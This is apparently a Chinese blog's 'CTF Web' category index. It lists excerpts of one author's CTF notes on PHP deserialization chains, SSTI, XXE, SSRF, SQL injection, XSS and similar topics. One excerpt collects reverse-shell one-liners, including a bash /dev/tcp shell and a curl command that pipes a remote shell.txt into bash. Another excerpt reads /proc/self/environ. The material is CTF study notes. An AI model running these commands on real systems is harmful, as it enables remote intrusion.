随笔分类 -  CTF Web

摘要:FROM php:7.4-apache #RUN mv "$PHP_INI_DIR/php.ini-production" "$PHP_INI_DIR/php.ini" COPY ./php.ini /usr/local/etc/php/php.ini COPY ./source.list /etc 阅读全文
posted @ 2020-09-17 21:50 MustaphaMond 阅读(422) 评论(0) 推荐(0) 编辑
摘要:pop1 thinkphp v5.2.x 反序列化利用链挖掘 thinkphp v6.0.x 反序列化利用链挖掘 think\Model->__destruct() /vendor/topthink/think-orm/src/Model.php __destruct() $this->save() 阅读全文
posted @ 2020-09-09 16:44 MustaphaMond 阅读(726) 评论(0) 推荐(1) 编辑
摘要:ThinkPHP5.1.X反序列化利用链 think\process\pipes\Windows->__destruct() 入口点:thinkphp/library/think/process/pipes/Windows.php public function __destruct() { $th 阅读全文
posted @ 2020-09-09 10:19 MustaphaMond 阅读(241) 评论(0) 推荐(0) 编辑
摘要:语言参考 基本语法 PHP标记 PHP 开始和结束标记有四种 当解析一个文件时,PHP 会寻找起始和结束标记,也就是<?php和?> <script language="php"> echo 'some editors (like FrontPage) don\'t like processing 阅读全文
posted @ 2020-08-17 20:51 MustaphaMond 阅读(347) 评论(0) 推荐(1) 编辑
摘要:python内置函数 文档 __import__()用来导入模块,并可以直接返回模块对象,也就是说可以直接调用函数 open()可以打开文件,可以open().read()直接读文件,也可以next(open())读取文件的第一行 eval()、exec()是主要执行命令的函数 __builtins 阅读全文
posted @ 2020-08-04 22:56 MustaphaMond 阅读(705) 评论(0) 推荐(0) 编辑
摘要:基础命令 远程登录 redis-cli -h host -p port -a password 键 SET runoobkey redis DEL runoobkey keys *获取所有键值 字符串 get runoobkey 连接 AUTH "password" 验证密码 字符串操作 set t 阅读全文
posted @ 2020-08-01 17:37 MustaphaMond 阅读(938) 评论(0) 推荐(0) 编辑
摘要:Linux /proc/self/environ当前进程的环境变量 /proc/self/cmdline文件查看当前进行进程执行命令 /proc/[pid]/fd/[fid]当程序打开一个文件, 会获得程序的文件描述符, 而此时如果文件被删除, 只会删除文件的目录项, 不会清空文件的内容, 原来的进 阅读全文
posted @ 2020-07-31 19:32 MustaphaMond 阅读(620) 评论(0) 推荐(0) 编辑
摘要:通用 拿到package.json首先npm audit看看依赖库有没有漏洞 原型链污染 漏洞特征 深入理解 JavaScript Prototype 污染攻击 以下内容出自p神的文章 我们思考一下,哪些情况下我们可以设置__proto__的值呢?其实找找能够控制数组(对象)的“键名”的操作即可: 阅读全文
posted @ 2020-04-08 14:25 MustaphaMond 阅读(1427) 评论(0) 推荐(0) 编辑
摘要:收集一点可能用上的反弹shell命令 bash bash -i >& /dev/tcp/ip/port 0>&1 curl bash -i >& /dev/tcp/192.168.20.151/7777 0>&1 curl http://174.1.73.154/shell.txt|bash PS: 阅读全文
posted @ 2020-03-02 20:53 MustaphaMond 阅读(810) 评论(0) 推荐(2) 编辑
摘要:pop1 Illuminate\Broadcasting\PendingBroadcast->__destruct() Faker\Generator->__call() Faker\Generator->format() Faker\Generator->getFormatter() <?php 阅读全文
posted @ 2020-02-25 22:17 MustaphaMond 阅读(394) 评论(0) 推荐(0) 编辑
摘要:获取表名 innodb MySQL 5.6 及以上版本存在innodb_index_stats,innodb_table_stats两张表,其中包含新建立的库和表 select table_name from mysql.innodb_table_stats where database_name 阅读全文
posted @ 2020-02-24 20:50 MustaphaMond 阅读(6302) 评论(0) 推荐(0) 编辑
摘要:漏洞成因 使用 这种支持多语句执行的函数 使用PDO的方式进行数据查询,创建PDO实例时 设置为 时,可以执行多语句 ps:附上一片PDO的宽字节注入 "从宽字节注入认识PDO的原理和正确使用" ,预编译也不是滴水不漏 bypass技巧 以[GYCTF2020]Blacklist为例 获取库名、表名 阅读全文
posted @ 2020-02-24 13:50 MustaphaMond 阅读(736) 评论(0) 推荐(0) 编辑
摘要:序 Laravel是一款比较流行的优秀php开发框架,本身也比较重,通过这个框架来接触大型框架的代码审计、包括锻炼反序列化漏洞的挖掘利用是比较合适的。在学习了几天Laravel开发以后,我尝试复现了一下CVE 2019 9081,整体过程和原作者还是有些区别的,原作者思维比较跳跃的地方,我按自己的思 阅读全文
posted @ 2020-02-22 03:20 MustaphaMond 阅读(938) 评论(0) 推荐(0) 编辑
摘要:CTF XSS 这一块接触的不多,这次先当搬运工,之后慢慢补上自己的东西 渗透流程 参考XSS备忘录 fuzz "'<script javascript onload src><a href></a>#$%^ '";!-=#$%^&{()}<script javascript data onload 阅读全文
posted @ 2020-01-17 20:52 MustaphaMond 阅读(2991) 评论(1) 推荐(1) 编辑
摘要:preg_match绕过总结 什么是preg_match 绕过方法 1、数组绕过 preg_match只能处理字符串,当传入的subject是数组时会返回false 2、PCRE回溯次数限制 PHP利用PCRE回溯次数限制绕过某些安全限制 import requests from io import 阅读全文
posted @ 2020-01-15 18:44 MustaphaMond 阅读(24916) 评论(5) 推荐(1) 编辑
摘要:.htaccess在CTF Web中还是很常见的,今天又做到一道很有意思的题,下定决心总结一波 一、什么是.htaccess 参考 "Apache HTTP Server Tutorial: .htaccess files" .htaccess文件(或“分布式配置文件”)提供了一种基于每个目录进行配 阅读全文
posted @ 2019-10-25 23:14 MustaphaMond 阅读(1193) 评论(1) 推荐(2) 编辑
摘要:序列化 所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。unserialize()函数能够重新把字符串变回php原来的值。 序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。 --php官方文档 魔术方法 php官方文档中关于魔 阅读全文
posted @ 2019-09-04 22:12 MustaphaMond 阅读(12380) 评论(2) 推荐(7) 编辑
摘要:基本判断 渲染模板 flask/jinja flask SSTI的基本思路就是利用python中的魔术方法找到自己要用的函数 __dict__ 保存类实例或对象实例的属性变量键值对字典 __class__ 返回类型所属的对象 __mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺 阅读全文
posted @ 2019-08-28 17:33 MustaphaMond 阅读(10438) 评论(2) 推荐(3) 编辑
摘要:参考链接: "XXE萌新进阶全攻略" "未知攻焉知防——XXE漏洞攻防" "歪?我想要一个XXE。" "xxe笔记" "Blind XXE 详解 + Google CTF 一道题目分析" 一、基础知识 1、XML 即 可扩展标记语言(EXtensible Markup Language),是一种标记 阅读全文
posted @ 2019-08-26 16:29 MustaphaMond 阅读(11154) 评论(1) 推荐(9) 编辑
摘要:概念 SSRF(Server-Side Request Forgery),服务器端请求伪造,利用漏洞伪造服务器端发起请求,从而突破客户端获取不到数据的限制 对外发起网络请求的地方都可能存在SSRF漏洞 危害 1、可以对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息 2、攻击运 阅读全文
posted @ 2019-08-25 17:24 MustaphaMond 阅读(4074) 评论(0) 推荐(0) 编辑